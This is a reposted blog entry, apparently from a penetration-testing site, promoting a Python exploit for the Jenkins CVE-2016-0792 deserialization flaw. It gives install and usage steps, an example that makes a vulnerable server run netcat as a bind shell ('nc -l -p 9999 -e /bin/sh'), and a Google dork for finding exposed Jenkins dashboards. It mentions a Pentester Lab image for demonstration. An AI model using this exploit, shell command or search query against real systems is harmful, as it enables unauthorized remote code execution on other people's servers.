Jenkins CVE-2016-0792 Deserialization Remote Exploit – Penetration Testing

What is CVE-2016-0792?

Multiple unspecified API endpoints in Jenkins before 1.650 and LTS before 1.642.2 allow remote authenticated users to execute arbitrary code via serialized data in an XML file, related to XStream and groovy.util.Expando.

Exploit

Jenkins CVE-2016-0792

Exploit for Jenkins serialization vulnerability – CVE-2016-0792

More information can be found here

Contrast Security

Pentester Lab

Requirements

Python 3.6.x

requests library is required for this exploit to work

sudo pip install requests

git clone http://ift.tt/2vfSwAm

Usage

python3

from exploit import exploit

exploit(url, command)

Where url is url to jenkins server and command is command to execute

Example

exploit(‘http://ift.tt/2tRLOgm’, ‘/usr/bin/nc -l -p 9999 -e /bin/sh’)

This will run nc and listen on port 9999 on vulnerable machine

For demonstration purposes I will be running ISO from Pentester Lab

Google dork: intitle: “Dashboard [Jenkins]” + “Manage Jenkins”

The post Jenkins CVE-2016-0792 Deserialization Remote Exploit appeared first on Penetration Testing.

http://ift.tt/2vg6lhX http://ift.tt/2aM8QhC

Anúncios

Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s